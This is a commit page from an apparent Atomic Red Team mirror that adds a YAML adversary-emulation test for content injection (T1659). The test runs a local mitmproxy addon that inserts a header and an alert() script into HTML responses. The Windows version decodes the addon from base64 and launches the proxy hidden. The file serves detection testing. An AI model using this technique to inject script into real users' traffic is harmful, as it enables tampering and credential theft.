security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

New Test T1659 (Content Injection Using MITM Proxy) (#3305)

Browse Source 
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
This commit is contained in:
Wai Linn Oo
2026-04-20 08:50:13 +06:30
committed by GitHub
parent 4ad4adf40a
commit 53c52a2d58
1 changed files with 101 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1659/T1659.yaml
+101
View File
@@ -0,0 +1,101 @@
attack_technique: T1659
display_name: Content Injection
atomic_tests:
- name: MITM Proxy Injection
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: |
command -v python3
get_prereq_command: |
brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
- description: curl must be installed
prereq_command: |
command -v curl
get_prereq_command: |
brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
- description: pipx must be installed
prereq_command: |
pipx --version
get_prereq_command: |
brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
- description: mitmproxy must be installed
prereq_command: |
pipx list | grep mitmproxy
get_prereq_command: |
pipx install mitmproxy || brew install mitmproxy
- description: mitmdump must be running on port 8080
prereq_command: |
lsof -i tcp:8080 | grep mitmdump
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
- name: MITM Proxy Injection (Windows)
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: |
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
winget install --id Python.Python.3 -e
- description: curl must be installed
prereq_command: |
if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
winget install --id cURL.cURL -e
- description: mitmproxy must be installed and in PATH
prereq_command: |
if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
python -m pip install mitmproxy
- description: mitmdump must be running on port 8080
prereq_command: |
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue